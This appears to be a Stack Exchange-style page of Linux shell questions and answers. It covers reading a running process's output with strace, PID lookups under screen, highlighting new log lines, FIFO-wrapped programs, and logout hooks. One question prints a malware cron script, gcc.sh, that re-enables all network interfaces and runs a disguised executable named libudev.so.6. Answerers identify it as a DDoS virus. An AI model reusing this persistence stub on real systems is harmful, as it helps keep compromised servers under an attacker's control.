Read stdout from a process (embedded Linux)

Before flagging the question as a duplicate, please read about the various issues I encountered.
A bit of background: we are developing a C++ application that runs on an embedded ARM SBC under a lite variant of Debian Linux. The application starts at boot, launched by the boot script, and prints various information to stdout. What we would like is the ability to connect via SSH/Telnet and read the application's output, without having to kill the process and restart it inside the current bash session. I want to create a simple .sh script that non-tech-savvy people can use.
The first solution offered for the similar question posted here is to use gdb. For one thing it's not user-friendly (you need to type multiple commands manually), and, for reasons I don't understand, it doesn't seem to output anything into the file.
The second solution, strace -ewrite -p PID, works perfectly; that's what I want. The problem is that it prints a lot more information than just the stdout, and it's badly formatted.
I managed to get an "acceptable" result with strace -e write=1 -s 1024 -p 20049 2>&1 | grep "write(1,", but it still has the superfluous write(1, "...", 19) = 19 text around every line. From this point on it's simply a matter of string formatting, and on multiple other pages I've found this line, which supposedly achieves good formatting: strace -ff -e write=1,2 -s 1024 -p PID 2>&1 | grep "^ |" | cut -c11-60 | sed -e 's/ //g' | xxd -r -p
There are some things I find strange in this command (why -ff? why grep "^ |"? why use xxd there?), and it simply doesn't output anything when I try it.
Unfortunately, we use an old, buggy version of BusyBox (1.7.1) that has problems with multiple pipes, and that bug gives me bad results. For example, if I only run the grep it works, and if I only run the cut it also works, but grep "write(1," | cut -c11-60 returns nothing.
I know the real solution would simply be to update BusyBox and use multiple pipes to format the string, but we can't update it, since the OS distribution is already installed on thousands of boards shipped to our clients worldwide.
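For what it's worth, a single-pipe variant along these lines might sidestep the pipe bug (a sketch I have not been able to verify against BusyBox 1.7.1's sed; note that strace prints escaped strings, so \n shows up literally rather than as a newline):
strace -e trace=write -s 1024 -p "$PID" 2>&1 | sed -n 's/^write(1, "\(.*\)", [0-9]*) *= *[0-9]*$/\1/p'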
Anyone have a miraculous solution? Thanks

Screen can be connected to an existing process using reptyr (http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/), or you can use neercs (http://caca.zoy.org/wiki/neercs), which I haven't used, but which is apparently like screen and supports attaching to an existing process all by itself.
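A minimal usage sketch, assuming reptyr is installed on the board and myapp stands in for the application's binary name:
# grab the running process's terminal from inside the SSH session
PID=$(pidof myapp)
reptyr "$PID"
Starting screen first and running reptyr inside it means you can later detach with C-a d without touching the application.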

Related

Get PID in bash file with open screen

I am a beginner in bash programming. I want to obtain the PIDs of processes, in order to use trap and kill to send signals to, and receive them from, a program in the same file.
In particular, I start the program opening a screen in this way:
screen -d -m "start program"
process_id=`/bin/ps -fu $USER| grep "program" | grep -v "grep" | awk '{print $2}'`
The variable process_id contains two PIDs, not one. If I run the program without a screen, I don't have this issue (but I do have to open the screen).
Does anyone have solutions to this problem?
Another question: If I write
screen -d -m "start program">log
the log file isn't written. Any suggestions?
For your first question, pgrep (or "process grep") is what you are looking for.
For instance, the following will return a list of PIDs of all running bash processes.
pgrep bash
And if you read the docs:
-signal
Defines the signal to send to each matched process. Either the numeric or the symbolic signal name can be used.
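A minimal sketch, with program standing in for the actual binary name; matching on the process name rather than the full command line avoids also catching the enclosing screen process:
process_id=$(pgrep program)   # name match only, so 'screen ... program' is excluded
kill -USR1 "$process_id"      # or in one step: pkill -USR1 program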
For your second question, you could use the -Logfile flag, if your version of screen supports it, or specify the log file in your .screenrc configuration file.
This has already been answered.
Edit:
If you can't access the user's home directory, where the configuration file .screenrc is usually kept, you can set the $SCREENRC environment variable to point explicitly to an alternative path.
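A sketch of both routes, assuming a screen recent enough to know -Logfile (older versions only have -L, which logs to screenlog.0, plus the logfile setting in .screenrc):
screen -L -Logfile /tmp/program.log -d -m "start program"
# or in ~/.screenrc (or the file $SCREENRC points to):
#   logfile /tmp/program.log
#   deflog on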

tail -f OR less +F how to highlight new lines

Is there any way to highlight (e.g., bold or colorize) lines newly added since the last change?
For example, I am watching a log file with multiple similar errors in a PHP error_log (differing only in line number, function name, etc.), and I have to inspect the timestamps to see where one set of errors ends and another begins (a page refresh).
It would be very helpful if there were a way to highlight only the most recently added lines.
I am looking for a solution that runs in the console on macOS and Linux.
Check out the watch command, if your system has it. The command:
watch -d tail /your/file/here
will display the file and highlight the differences character by character. Note that you do not want to use the -f option in this case.
Ubuntu has it. For OSX, you can use brew install watch if you have Homebrew installed, or sudo port install watch if you use MacPorts.
Another bonus is that it works for any command whose output changes over time. We have even used it with ls -l to watch the progress of backups and file compressions.
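For example, a sketch with a placeholder path (watch re-runs the command every two seconds by default; -n changes the interval):
watch -d 'ls -l /path/to/backups'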
"tail" itself does not offer a serious way to do this. But give "multitail" a closer look:
https://www.vanheusden.com/multitail/
And for Mac OSX:
http://macappstore.org/multitail/
Turn on grep's line buffering mode.
Using tail
tail -f fileName | grep --line-buffered my_pattern
Using less
less +F fileName | grep --line-buffered my_pattern
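To make the matches themselves stand out, grep's coloring can be forced on as well (a sketch; my_pattern as above):
tail -f fileName | grep --line-buffered --color=always my_pattern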
Using watch & tail to highlight new lines
watch -d tail fileName
Note: for Linux-based systems.

Linux shell wrap a program's stdin and stdout using pipes

So, I have this interactive program running on an embedded Linux ARM platform with no screen, which I cannot modify. To interact with it I have to SSH into the embedded Linux distro and run the program, which is some sort of custom command line with built-in commands; it does not exit, and only SIGINT will quit it.
I'm trying to automate it by letting it run in the background and communicating with it through pipes, sending SSH commands like ssh user@host echo "command" > stdinpipe. This part works; I've been given an example like the following in a shell script (I cannot use bash; I only have ash installed on the machine):
#!/bin/sh
mkfifo somePipe
/proc/<PID>/exe < somePipe 2>&1 &
I can now easily command the program by writing to the pipe like
echo "command" > somePipe
and it outputs everything inside the terminal. The problem is that while this works when I have an SSH session open, it won't when I only send commands one by one as described earlier. (I'm using paramiko in Python with the exec_command() method, in case that matters, though I don't think it's relevant; I could use invoke_session(), but I don't want to have to deal with recv().)
So I figured I'd redirect the output of the program to a pipe. That's where the problems arise. My first attempt was this one (please ignore the fact that everything is run as root and stored in the root home folder; that's how I got it, I don't have time to clean it up right now, and I'm not the one managing the software):
cd /root/binary
mkfifo outpipe
mkfifo inpipe
./command_bin &
# find PID automatically
command_pid=$(ps -a | egrep ' * \.\/command_bin *' | grep -v grep | awk '{print $1}')
/proc/${command_pid}/exe < inpipe 2>&1 &
echo "process ./command_bin running on PID ${command_pid}"
That alone works within the terminal itself. Now, if I leave the SSH session open, open another terminal, and type ssh root@host "echo command > /root/binary/inpipe", the command gets executed, but it then prints the command I just typed and its result into the other terminal that stayed open. So that is obviously not an option; I have to capture the output somehow.
If I change ./command_bin & to ./command_bin >outpipe &, the program never starts, and I have no idea why; I know this because $command_pid is empty and I cannot find the process with ps -A.
Now, if I instead replace /proc/${command_pid}/exe < inpipe 2>&1 & with /proc/${command_pid}/exe < inpipe &>outpipe &, the program starts, and once the script has finished running I can write to inpipe just fine with echo "command" > inpipe; however, if I try cat < outpipe or tail outpipe, it just hangs and does nothing. I've tried using nohup when starting the command, but it doesn't really help. I've also tried using a normal file instead of a FIFO for redirecting the output, with exactly the same results.
I've spent the entire day on this and cannot get it to work. Why is this not working? I'm probably also going about this in an awful way; is there another way? The only hard requirements are that I connect to the board through SSH and that the command-line utility stays open, because it is communicating with onboard devices (using I2C, OneWire, and similar protocols).
To keep it simple: I want to be able to write to the program's stdin whenever I want, and to have its stdout go somewhere else (a file, a buffer, I don't care) from which I can easily retrieve it later, after an arbitrary amount of time, with cat, tail, or some other command over SSH.
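A likely explanation, for reference: opening a FIFO blocks until both a reader and a writer have it open, so ./command_bin >outpipe & sits in open() and never actually runs until something opens outpipe for reading. Note also that &> is a bash-ism; in ash, cmd &>outpipe may be parsed as cmd & followed by a bare >outpipe, so the output may never be attached to the FIFO at all. A minimal sketch that sidesteps both issues, assuming the program can be started directly with redirections rather than re-attached through /proc/<PID>/exe: use a FIFO only for stdin, hold its write end open so the program never sees EOF, and send stdout to a regular file, which never blocks on open.
#!/bin/sh
cd /root/binary
mkfifo inpipe 2>/dev/null
# hold the write end of the FIFO open for good, so stdin never hits EOF
# between individual 'echo command > inpipe' invocations
sleep 2147483647 > inpipe &
# read commands from the FIFO, append all output to a plain log file
./command_bin < inpipe >> output.log 2>&1 &
echo "send commands with:   echo command > inpipe"
echo "read the output with: tail -f output.log"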

Is this file (gcc.sh) in cron.hourly malware?

I have been experiencing spikes of up to 1 Gbps on my server and have been looking for viruses and malware. I found this file, gcc.sh, in /etc/cron.hourly, and was wondering if anyone has seen anything like it and could offer some insight into the code. Thanks!
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
Quite likely. It uses /lib/libudev.so.6 as an executable, while the name implies it should be a library; try using a tool like nm or objdump to check whether it's an executable. It copies /lib/libudev.so to .so.6, whereas normally the .so is a symlink to the versioned file. It also runs a for loop to bring up all network interfaces, even ones you've turned off. And it uses the name of a well-known compiler to look legitimate. I'd call this 99%+ likely a virus.
Found another reference to something calling itself gcc - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver . And yes, that's a DDoS virus on a unix system, exactly matching your problem.
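Two quick checks along the lines suggested above (a sketch; the paths are the ones from the script):
file /lib/libudev.so.6         # reports "... executable" vs. "... shared object"
objdump -f /lib/libudev.so.6   # prints the file format and start address
For a file named like a library, "executable" in the file output is a strong red flag.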
Yes, it is.
Try ps -ef | grep -i libudev.so.6 to see the processes used by the program.

How to run a script automatically when the user logs out in Linux?

I need to implement a feature that monitors which users log in to and out of the Linux desktop. When a user logs in or out, a script needs to run automatically to notify a daemon process of which user it was.
Searching Google, I found that a script placed under /etc/profile.d will be run automatically after a user logs in.
But I didn't find a common solution for running a script automatically when the user logs out. It looks like the solution differs between Linux distributions. For example:
For Ubuntu, I need to modify the file /etc/lightdm/lightdm.conf
I need to support multiple Linux distributions, including CentOS, Ubuntu, Red Hat, and so on. If I use a different solution for each distribution, my code will become very complicated.
I would like to find a common solution that works across distributions. Can you please give me some clues?
In bash, the ~/.bash_logout file is executed when the login shell exits, so place the script you want to run there.
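A minimal sketch, assuming a hypothetical notifier script at /usr/local/bin/notify-daemon.sh that forwards the event to your daemon:
# ~/.bash_logout -- executed when the login bash shell exits
/usr/local/bin/notify-daemon.sh logout "$USER"
Note that this only covers shell logins; a desktop session that never exits a login shell will not trigger it.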
Simply find out who is logged in and record when you first see them and when you no longer see them; then read the crontab manual page and install a process that keeps track of this.
The basic command: who | awk '{ print $1 }' | sort -u
Saving the data and diffing it against the previous pass:
set -- /tmp/whoseloggedin /tmp/whoWASloggedin
touch "$2"    # ensure the previous snapshot exists on the first pass
who | awk '{ print $1 }' | sort -u > "$1"
# users present now but not before have just logged in
comm -23 "$1" "$2" | sed "s/^/$(date) /" >> /tmp/justloggedIN
# users present before but not now have just logged off
comm -13 "$1" "$2" | sed "s/^/$(date) /" >> /tmp/justloggedOFF
mv "$1" "$2"
Sleep for a second or two, and repeat. You might want to store the data in a more reliable place than /tmp/.
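A crontab sketch for installing it, assuming the loop above is saved as a hypothetical /usr/local/bin/track-logins.sh that sleeps and repeats internally (@reboot is a common cron extension, not strictly POSIX):
@reboot /usr/local/bin/track-logins.sh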
